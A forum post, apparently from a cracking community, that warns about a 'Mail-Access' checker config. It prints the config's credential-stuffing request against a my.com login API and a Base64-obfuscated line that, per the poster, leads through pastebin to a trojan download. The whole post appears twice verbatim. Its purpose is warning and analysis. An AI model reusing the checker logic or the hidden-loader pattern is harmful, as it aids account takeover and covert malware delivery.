OP 16 April, 2021 - 10:12 PM
let me explain for the smoll brainers who want to learn:
config were talking about is called Mail-Acces 10K cpm
so let me explain:
[SCRIPT]
JUMP #PASSAPI
#PASSAPl
REQUEST GET "https://aj-https.my.com/cgi-bin/auth?model=&simple=1&Login=<USER>&Password=<PASS>"
HEADER "User-Agent: MyCom/12436 CFNetwork/758.2.8 Darwin/15.0.0"
KEYCHECK
KEYCHAIN Failure OR
KEY "Ok=0"
KEYCHAIN Success OR
KEY "Ok=1"
so it starts with making a GET request to a random api I haven't figured it out
might actually be a login api idk doesn't matter
then it will
FUNCTION Base64Decode "aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VhbjFNOUdM" -> VAR "urli"
BASE64 decode that random string
decoding that string reveals:
https://pastebin.com/raw/Ean-----
this URL in that pastebin there is a
Github link:
https://raw.githubusercontent.com/-----------/earth.mp4
it downloads a .MP4 file. this file is according to VT is
infect infected with a trojan so ye I fucked it with VT
but beware of these configs ty I hope I did a decent job of explenation
they hard code the config as BASE64 so you can't really
see what's happening if you come across this config
just upload it to VT it will fuck it up most likely
config were talking about is called Mail-Acces 10K cpm
so let me explain:
[SCRIPT]
JUMP #PASSAPI
#PASSAPl
REQUEST GET "https://aj-https.my.com/cgi-bin/auth?model=&simple=1&Login=<USER>&Password=<PASS>"
HEADER "User-Agent: MyCom/12436 CFNetwork/758.2.8 Darwin/15.0.0"
KEYCHECK
KEYCHAIN Failure OR
KEY "Ok=0"
KEYCHAIN Success OR
KEY "Ok=1"
so it starts with making a GET request to a random api I haven't figured it out
might actually be a login api idk doesn't matter
then it will
FUNCTION Base64Decode "aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VhbjFNOUdM" -> VAR "urli"
BASE64 decode that random string
decoding that string reveals:
https://pastebin.com/raw/Ean-----
this URL in that pastebin there is a
Github link:
https://raw.githubusercontent.com/-----------/earth.mp4
it downloads a .MP4 file. this file is according to VT is
infect infected with a trojan so ye I fucked it with VT
but beware of these configs ty I hope I did a decent job of explenation
they hard code the config as BASE64 so you can't really
see what's happening if you come across this config
just upload it to VT it will fuck it up most likely